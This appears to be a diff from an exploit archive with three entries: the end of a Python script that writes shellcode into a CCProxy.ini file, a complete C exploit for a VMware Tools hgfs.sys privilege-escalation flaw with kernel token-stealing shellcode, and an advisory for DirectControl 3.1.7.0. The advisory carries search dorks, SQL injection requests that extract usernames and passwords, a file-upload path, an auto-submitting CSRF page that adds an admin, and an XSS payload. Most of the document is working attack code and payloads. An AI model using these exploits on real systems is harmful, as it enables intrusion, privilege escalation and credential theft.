pad2 = "\x41" * 12
gdt3 = "\x04\xB4\x12\x00"
sc = (
# Avoid: '\x00\xff\xf5'
"\x6a\x32\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xba" +
"\xb3\x5c\xb6\x83\xeb\xfc\xe2\xf4\x46\x5b\xd5\xb6\xba\xb3" +
"\x3c\x3f\x5f\x82\x8e\xd2\x31\xe1\x6c\x3d\xe8\xbf\xd7\xe4" +
"\xae\x38\x2e\x9e\xb5\x04\x16\x90\x8b\x4c\x6d\x76\x16\x8f" +
"\x3d\xca\xb8\x9f\x7c\x77\x75\xbe\x5d\x71\x58\x43\x0e\xe1" +
"\x31\xe1\x4c\x3d\xf8\x8f\x5d\x66\x31\xf3\x24\x33\x7a\xc7" +
"\x16\xb7\x6a\xe3\xd7\xfe\xa2\x38\x04\x96\xbb\x60\xbf\x8a" +
"\xf3\x38\x68\x3d\xbb\x65\x6d\x49\x8b\x73\xf0\x77\x75\xbe" +
"\x5d\x71\x82\x53\x29\x42\xb9\xce\xa4\x8d\xc7\x97\x29\x54" +
"\xe2\x38\x04\x92\xbb\x60\x3a\x3d\xb6\xf8\xd7\xee\xa6\xb2" +
"\x8f\x3d\xbe\x38\x5d\x66\x33\xf7\x78\x92\xe1\xe8\x3d\xef" +
"\xe0\xe2\xa3\x56\xe2\xec\x06\x3d\xa8\x58\xda\xeb\xd0\xb2" +
"\xd1\x33\x03\xb3\x5c\xb6\xea\xdb\x6d\x3d\xd5\x34\xa3\x63" +
"\x01\x43\xe9\x14\xec\xdb\xfa\x23\x07\x2e\xa3\x63\x86\xb5" +
"\x20\xbc\x3a\x48\xbc\xc3\xbf\x08\x1b\xa5\xc8\xdc\x36\xb6" +
"\xe9\x4c\x89\xd5\xdb\xdf\x3f\x98\xdf\xcb\x39\xb6"
)
exp = hdr+buf+gdt1+pad1+gdt2+pad2+gdt3+sc
file = open("CCProxy.ini", "w")
file.write(exp)
file.close()

365
platforms/windows/local/30802.c Executable file
View file

@ -0,0 +1,365 @@
source: http://www.securityfocus.com/bid/26556/info
VMware Tools is prone to a privilege-escalation vulnerability.
The application fails to properly drop privileges before performing certain functions. An attacker can exploit this in the guest opertaing system to elevate privileges in the host operating system.
/*
VMware Tools hgfs.sys Local Privilege Escalation Vulnerability Exploit
Created by SoBeIt
Main file of exploit
Tested on:
Windows XP PRO SP2 Chinese
Windows XP PRO SP2 English
Windows 2003 PRO SP1 Chinese
Windows 2003 PRO SP1 English
Usage:vmware.exe
*/
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#pragma comment (lib, "advapi32.lib")
#define NTSTATUS int
#define ProcessBasicInformation 0
#define SystemModuleInformation 11
typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE, ULONG, PVOID, ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
typedef NTSTATUS (NTAPI *ZWALLOCATEVIRTUALMEMORY)(HANDLE, PVOID *, ULONG, PULONG, ULONG, ULONG);
typedef PIMAGE_NT_HEADERS (NTAPI *RTLIMAGENTHEADER)(PVOID);
typedef PVOID (NTAPI *RTLIMAGEDIRECTORYENTRYTODATA)(PVOID, ULONG, USHORT, PULONG);
ZWVDMCONTROL ZwVdmControl;
ZWQUERYINFORMATIONPROCESS ZwQueryInformationProcess;
ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
ZWALLOCATEVIRTUALMEMORY ZwAllocateVirtualMemory;
RTLIMAGENTHEADER RtlImageNtHeader;
RTLIMAGEDIRECTORYENTRYTODATA RtlImageDirectoryEntryToData;
typedef struct _IMAGE_FIXUP_ENTRY {
USHORT Offset:12;
USHORT Type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
typedef struct _PROCESS_BASIC_INFORMATION {
NTSTATUS ExitStatus;
PVOID PebBaseAddress;
ULONG AffinityMask;
ULONG BasePriority;
ULONG UniqueProcessId;
ULONG InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT Unknow;
USHORT LoadCount;
USHORT ModuleNameOffset;
char ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
unsigned char kfunctions[64][64] =
{
//ntoskrnl.exe
{"ZwTerminateProcess"},
{"PsLookupProcessByProcessId"},
{""},
};
unsigned char shellcode[] =
"\x90\x60\x9c\xe9\xc4\x00\x00\x00\x5f\x4f\x47\x66\x81\x3f\x90\xcc"
"\x75\xf8\x66\x81\x7f\x02\xcc\x90\x75\xf0\x83\xc7\x04\xbe\x38\xf0"
"\xdf\xff\x8b\x36\xad\xad\x48\x81\x38\x4d\x5a\x90\x00\x75\xf7\x95"
"\x8b\xf7\x6a\x02\x59\xe8\x4d\x00\x00\x00\xe2\xf9\x8b\x4e\x0c\xe8"
"\x29\x00\x00\x00\x50\x8b\x4e\x08\xe8\x20\x00\x00\x00\x5a\x8b\x7e"
"\x1c\x8b\x0c\x3a\x89\x0c\x38\x56\x8b\x7e\x14\x8b\x4e\x18\x8b\x76"
"\x10\xf3\xa4\x5e\x33\xc0\x50\x50\xff\x16\x9d\x61\xc3\x83\xec\x04"
"\x8d\x2c\x24\x55\x51\xff\x56\x04\x85\xc0\x0f\x85\x80\x8f\x00\x00"
"\x8b\x45\x00\x83\xc4\x04\xc3\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78"
"\x03\xf5\x56\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33"
"\xdb\x0f\xbe\x10\x85\xd2\x74\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1"
"\x3b\x1f\x75\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e"
"\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x37\xff\xff"
"\xff\x90\x90\x90"
"\x90\xcc\xcc\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\x90\x90\xcc";
void ErrorQuit(char *msg)
{
printf("%s:%d\n", msg, GetLastError());
ExitProcess(0);
}
void GetFunction()
{
HANDLE hNtdll;
hNtdll = LoadLibrary("ntdll.dll");
if(hNtdll == NULL)
ErrorQuit("LoadLibrary failed.\n");
ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
if(ZwVdmControl == NULL)
ErrorQuit("GetProcAddress failed.\n");
ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "ZwQueryInformationProcess");
if(ZwQueryInformationProcess == NULL)
ErrorQuit("GetProcAddress failed.\n");
ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
if(ZwQuerySystemInformation == NULL)
ErrorQuit("GetProcessAddress failed.\n");
ZwAllocateVirtualMemory = (ZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtdll, "ZwAllocateVirtualMemory");
if(ZwAllocateVirtualMemory == NULL)
ErrorQuit("GetProcAddress failed.\n");
RtlImageNtHeader = (RTLIMAGENTHEADER)GetProcAddress(hNtdll, "RtlImageNtHeader");
if(RtlImageNtHeader == NULL)
ErrorQuit("GetProcAddress failed.\n");
RtlImageDirectoryEntryToData = (RTLIMAGEDIRECTORYENTRYTODATA)GetProcAddress(hNtdll, "RtlImageDirectoryEntryToData");
if(RtlImageDirectoryEntryToData == NULL)
ErrorQuit("GetProcAddress failed.\n");
FreeLibrary(hNtdll);
}
ULONG GetKernelBase(char *KernelName)
{
ULONG i, Byte, ModuleCount, KernelBase;
PVOID pBuffer;
PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;
PCHAR pName;
ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
if((pBuffer = malloc(Byte)) == NULL)
ErrorQuit("malloc failed.\n");
if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte))
ErrorQuit("ZwQuerySystemInformation failed\n");
ModuleCount = *(PULONG)pBuffer;
pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));
for(i = 0; i < ModuleCount; i++)
{
if((pName = strstr(pSystemModuleInformation->ImageName, "ntoskrnl.exe")) != NULL)
{
KernelBase = (ULONG)pSystemModuleInformation->Base;
printf("Kernel is %s\n", pSystemModuleInformation->ImageName);
free(pBuffer);
strcpy(KernelName, "ntoskrnl.exe");
return KernelBase;
}
if((pName = strstr(pSystemModuleInformation->ImageName, "ntkrnlpa.exe")) != NULL)
{
KernelBase = (ULONG)pSystemModuleInformation->Base;
printf("Kernel is %s\n", pSystemModuleInformation->ImageName);
free(pBuffer);
strcpy(KernelName, "ntkrnlpa.exe");
return KernelBase;
}
pSystemModuleInformation++;
}
free(pBuffer);
return 0;
}
ULONG GetServiceTable(PVOID pImageBase, ULONG Address)
{
PIMAGE_NT_HEADERS pNtHeaders;
PIMAGE_BASE_RELOCATION pBaseRelocation;
PIMAGE_FIXUP_ENTRY pFixupEntry;
ULONG RelocationTableSize = 0;
ULONG Offset, i, VirtualAddress, Rva;
Offset = Address - (ULONG)pImageBase;
pNtHeaders = (PIMAGE_NT_HEADERS)RtlImageNtHeader(pImageBase);
pBaseRelocation = (PIMAGE_BASE_RELOCATION)RtlImageDirectoryEntryToData(pImageBase, FALSE, IMAGE_DIRECTORY_ENTRY_BASERELOC, &RelocationTableSize);
if(pBaseRelocation == NULL)
return 0;
do
{
pFixupEntry = (PIMAGE_FIXUP_ENTRY)((ULONG)pBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));
RelocationTableSize = (pBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1;
for(i = 0; i < RelocationTableSize; i++, pFixupEntry++)
{
if(pFixupEntry->Type == IMAGE_REL_BASED_HIGHLOW)
{
VirtualAddress = pBaseRelocation->VirtualAddress + pFixupEntry->Offset;
Rva = *(PULONG)((ULONG)pImageBase + VirtualAddress) - (ULONG)pNtHeaders->OptionalHeader.ImageBase;
if(Rva == Offset)
{
if (*(PUSHORT)((ULONG)pImageBase + VirtualAddress - 2) == 0x05c7)
return *(PULONG)((ULONG)pImageBase + VirtualAddress + 4) - pNtHeaders->OptionalHeader.ImageBase;
}
}
}
*(PULONG)&pBaseRelocation += pBaseRelocation->SizeOfBlock;
} while(pBaseRelocation->VirtualAddress);
return 0;
}
ULONG ComputeHash(char *ch)
{
ULONG ret = 0;
while(*ch)
{
ret = ((ret << 25) | (ret >> 7)) + *ch++;
}
return ret;
}
int main(int argc, char *argv[])
{
PVOID pDrivers[256];
PULONG pStoreBuffer, pTempBuffer, pShellcode;
PUCHAR pRestoreBuffer, pBase, FunctionAddress;
PROCESS_BASIC_INFORMATION pbi;
SYSTEM_MODULE_INFORMATION smi;
OSVERSIONINFO ovi;
char DriverName[256], KernelName[64];
ULONG Byte, len, i, j, k, BaseAddress, Value, KernelBase, buf[64];
ULONG HookAddress, SystemId, TokenOffset, Sections, Pid, FunctionNumber;
ULONG SSTOffset, AllocationSize;
HANDLE hDevice, hKernel;
printf("\n VMware Tools hgfs.sys Local Privilege Escalation Vulnerability Exploit \n\n");
printf("\t Create by SoBeIt. \n\n");
if(argc != 1)
{
printf(" Usage:%s \n\n", argv[0]);
return 1;
}
GetFunction();
if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
ErrorQuit("ZwQueryInformationProcess failed\n");
KernelBase = GetKernelBase(KernelName);
if(!KernelBase)
ErrorQuit("Unable to get kernel base address.\n");
printf("Kernel base address: %x\n", KernelBase);
ovi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if(!GetVersionEx(&ovi))
ErrorQuit("GetVersionEx failed.\n");
if(ovi.dwMajorVersion != 5)
ErrorQuit("Not Windows NT family OS.\n");
printf("Major Version:%d Minor Version:%d\n", ovi.dwMajorVersion, ovi.dwMinorVersion);
switch(ovi.dwMinorVersion)
{
case 1: //WindowsXP
SystemId = 4;
TokenOffset = 0xc8;
break;
case 2: //Windows2003
SystemId = 4;
TokenOffset = 0xc8;
break;
default:
SystemId = 8;
TokenOffset = 0xc8;
}
pRestoreBuffer = malloc(0x100);
if(pRestoreBuffer == NULL)
ErrorQuit("malloc failed.\n");
hKernel = LoadLibrary(KernelName);
if(hKernel == NULL)
ErrorQuit("LoadLibrary failed.\n");
printf("Load Base:%x\n", (ULONG)hKernel);
SSTOffset = GetServiceTable(hKernel, (ULONG)GetProcAddress(hKernel, "KeServiceDescriptorTable"));
SSTOffset += KernelBase;
printf("SystemServiceTable Offset:%x\n", SSTOffset);
FunctionNumber = *(PULONG)((ULONG)ZwVdmControl + 1);
printf("NtVdmControl funciton number:%x\n", FunctionNumber);
HookAddress = (ULONG)(SSTOffset + FunctionNumber * 4);
printf("NtVdmCotrol function entry address:%x\n", HookAddress);
AllocationSize = 0x1000;
pStoreBuffer = (PULONG)0x7;
if(ZwAllocateVirtualMemory((HANDLE)0xffffffff, &pStoreBuffer, 0, &AllocationSize,
MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE))
ErrorQuit("ZwAllocateVirtualMemory failed.\n");
FunctionAddress = (PUCHAR)GetProcAddress(hKernel, "NtVdmControl");
if(FunctionAddress == NULL)
ErrorQuit("GetProcAddress failed.\n");
*(PULONG)pRestoreBuffer = FunctionAddress - (PUCHAR)hKernel + KernelBase;
memset((PVOID)0x0, 0x90, AllocationSize);
hDevice = CreateFile("\\\\.\\HGFS", FILE_EXECUTE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
ErrorQuit("CreateFile failed.\n");
pShellcode = (PULONG)shellcode;
for(k = 0; pShellcode[k++] != 0x90cccc90; )
;
for(j = 0; kfunctions[j][0] != '\x0'; j++)
buf[j] = ComputeHash(kfunctions[j]);
buf[j++] = pbi.InheritedFromUniqueProcessId;
buf[j++] = SystemId;
buf[j++] = (ULONG)pRestoreBuffer;
buf[j++] = HookAddress;
buf[j++] = 0x4;
buf[j++] = TokenOffset;
memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
memcpy((PUCHAR)pStoreBuffer + 0x20, shellcode, sizeof(shellcode) - 1);
pTempBuffer = malloc(0x1000);
memset(pTempBuffer, 0x44, 0x1000);
DeviceIoControl(hDevice, 0x14018F, (PVOID)HookAddress, 0x4, pTempBuffer, 0x4, &Byte, NULL);
CloseHandle(hDevice);
CloseHandle(hKernel);
printf("Exploitation finished.\n");
ZwVdmControl(0, NULL);
return 1;
}
//

138
platforms/windows/webapps/30669.txt Executable file
View file

@ -0,0 +1,138 @@
DirectControlTM Version 3.1.7.0 - Multiple Vulnerabilties
====================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : www.directclarity.com
.:. Dork : [1]intext:"DirectClarity, LLC All Rights Reserved."
[2]inurl:"/cm/password_retrieve.asp?redir_id=1"
####################################################################
################################
[1] Sql Injection
===================
type: Post String Mssql Injection
extrct version database:
-------------------------
POST /cm/password_retrieve.asp HTTP/1.1
Host: www.server.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site/cm/password_retrieve.asp
Cookie: __utma=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
redir_id=1&uname=' and+1=cast(@@version as int)--
-&email_password=Email+My+Password
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Cache-Control: private
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date:
Content-Length: 352
redir_id=1&uname=|command|&email_password=Email+My+Password
extrct Username & password:
----------------------------
information:
tablename:portal_accounts
columns: username , password
POST /cm/password_retrieve.asp HTTP/1.1
Host: www.server.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site/cm/password_retrieve.asp
Cookie: __utma=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts)
as int)
-- -&email_password=Email+My+Password
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Cache-Control: private
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date:
Content-Length: 352
username:
redir_id=1&uname=' and+1=cast((Select TOP 1 username from portal_accounts)
as int)
-- -&email_password=Email+My+Password
password:
redir_id=1&uname=' and+1=cast((Select TOP 1 password from portal_accounts)
as int)
-- -&email_password=Email+My+Password
[2] Arbitrary File Upload
==========================
http://site/cm/fileManage/default.asp?action=UploadFiles&path=/cm/media/images
your file:
http://site/cm/media/images
[3] CSRF [Add Admin]
=====================
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/cm/admin.asp">
<input type="hidden" name="fname" value="...."/>
<input type="hidden" name="lname" value="...."/>
<input type="hidden" name="uname" value="admin"/>
<input type="hidden" name="pword" value="123456"/>
<input type="hidden" name="telco" value="...."/>
<input type="hidden" name="email" value="...."/>
<input type="hidden" name="ustat" value="0"/>
<input type="hidden" name="SecGroupDropDown" value="1"/>
<input type="hidden" name="AddButton" value="ADD THIS USER"/>
<input type="hidden" name="pageView" value="User Administration"/>
<input type="hidden" name="pageAction" value="Add System User"/>
<input type="hidden" name="whatDo" value="AddUserAction"/>
</form>
</body>
</html>
[4] Cross Site Scripting
=========================
Go to:
http://site/cm/admin.asp?pageView=General Configuration&pageAction=RSS
Management
and add new channel
put in new channel:
<script>alert(document.cookie);</script>
and submit!
####################################################################